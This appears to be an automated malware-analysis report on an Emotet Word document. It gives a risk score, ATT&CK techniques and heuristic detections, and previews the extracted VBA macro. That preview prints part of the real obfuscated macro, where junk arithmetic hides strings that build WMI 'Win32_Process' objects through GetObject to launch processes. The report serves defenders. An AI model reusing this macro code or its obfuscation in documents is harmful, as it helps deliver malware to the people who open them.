MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a critical ClamAV detection for Emotet, and high-severity heuristics indicate the presence of an AutoOpen VBA macro designed for execution. The VBA code is heavily obfuscated but the presence of GetObject and the overall structure strongly suggest it is designed to download and execute a secondary payload, a common Emotet behavior. The file's metadata and the presence of VBA macros further support this assessment.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6865933-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6865933-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46054 bytes |
SHA-256: b02305e3f83539b6f96d99888d4749d8d159092a20a204a132f2f00299c05144 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "O__99_58"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "T760850"
Function i200263()
Select Case R17__3__
Case 914098063
S_9_8057 = (W43616_4 * Fix(861198158 / CBool(f66749))) - F5603_ / Oct(273793350) / 947061154 + CStr(d9_2___5) - 556571683 + ChrB(q013__83)
End Select
Select Case W02_458
Case 884128243
M22808 = (v77_11 * Fix(90431152 / CBool(J936419_))) - m94799 / Oct(648396861) / 61957883 + CStr(W1464_52) - 485742884 + ChrB(q_9642)
End Select
Select Case Q_7233
Case 389637077
S_594__ = (o707_8_ * Fix(341883455 / CBool(i__6896))) - F093_547 / Oct(292794980) / 577289925 + CStr(k3__16_) - 933793964 + ChrB(s9_6088)
End Select
Select Case w10186
Case 27643935
u_8_089 = (A_18593 * Fix(941462333 / CBool(E_3726_1))) - p92946 / Oct(966816295) / 830531601 + CStr(Q14_131) - 414643824 + ChrB(v98390)
End Select
Select Case U3_4_4_3
Case 446300500
z37939 = (i7_93__5 * Fix(662189531 / CBool(H_1_34__))) - t856___ / Oct(134916042) / 105217098 + CStr(h2_508) - 779977807 + ChrB(u4___2)
End Select
Select Case n17_4_0
Case 899724169
z33__0_ = (w25_969 * Fix(601347652 / CBool(L038_7_8))) - l8_947 / Oct(225180255) / 585030365 + CStr(L78135) - 443688860 + ChrB(Z055____)
End Select
Select Case k954_1
Case 133057382
d0175_3_ = (U_4692 * Fix(634586370 / CBool(f4676432))) - z9_17_ / Oct(698094631) / 377012857 + CStr(t_89_43) - 448597283 + ChrB(J343_934)
End Select
Select Case E65_647
Case 972184721
i_0403_ = (f572308 * Fix(227084380 / CBool(t2585105))) - Z8_33__3 / Oct(691971548) / 522891320 + CStr(f9329524) - 873751269 + ChrB(N564464_)
End Select
End Function
Function f_7___7(b2_270, I294_7)
On Error Resume Next
Select Case I_60__
Case 598783694
j__5_99_ = (a_3_312 * Fix(245290002 / CBool(r__07076))) - O6_9__ / Oct(588987429) / 484044637 + CStr(I281_6_) - 916487657 + ChrB(p9961_2)
End Select
Select Case R__8052
Case 804925466
U0_44_0 = (l84881 * Fix(250970646 / CBool(w013_8))) - I__3005 / Oct(145250280) / 375984152 + CStr(r75629_) - 51281922 + ChrB(L76___)
End Select
b56078 = K47052 + "winmgmts:Win32" + D570_68 + "_ProcessStartup" + n02_83
Select Case s93_7_21
Case 570996463
c_15_3_9 = (V53__9 * Fix(149251606 / CBool(F08015_8))) - v732_6_2 / Oct(548225770) / 909035258 + CStr(H_6751_) - 593779238 + ChrB(i093_211)
End Select
Select Case j7595__9
Case 754827813
h1767_51 = (J43_50_4 * Fix(999766760 / CBool(w0_69645))) - L_2_16 / Oct(472767058) / 780948741 + CStr(j2273291) - 151016956 + ChrB(n1205_1)
End Select
Y3_8_2_8 = q9_33482 + "winmgmts:Win32" + X578059 + "_Process" + f69__880
Select Case b20___
Case 800181916
a7_821_ = (h8____4 * Fix(368393990 / CBool(k9614_1))) - q7380___ / Oct(338505359) / 486620231 + CStr(C93__7) - 813143116 + ChrB(Y8_3_126)
End Select
Select Case q08615
Case 92164014
i735_45 = (b6__13 * Fix(422545899 / CBool(S_96581))) - c4452_7_ / Oct(352620018) / 774716109 + CStr(h5_3_94_) - 608471506 + ChrB(K__0_320)
End Select
Select Case o65_21
Case 684598838
R03162 = (A_735_2 * Fix(812240848 / CBool(i6__3702))) - i253___ / Oct(76875373) / 325078139 + CStr(c88_6_) - 948031817 + ChrB(N__3114)
End Select
Set Z0_68157 = GetObject(R424__74 + b56078 + G17_02_)
Select Case l0__65
Case 868278654
j8_2___ = (w___22_7 * Fix(55000238 / CBool(V__72_6_))) - Q46_5_9 / Oct(693191206) / 995521083 + CStr(h_425_9) - 892081185 + ChrB(M_0_006_)
End Select
Select Case o3375135
Case 608276267
m7_8051 = (U07_76_ * Fix(597775005 / CBool(P061__63))) - w50_3_68 / Oct(377773837) / 816807087 + CStr(I_61_51) - 903658428 + ChrB(o___57_)
End Select
Select Case A0_393
Case 756217462
B07321_1 = (z605_177 * Fix(614637756 / CBool(H8354114
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.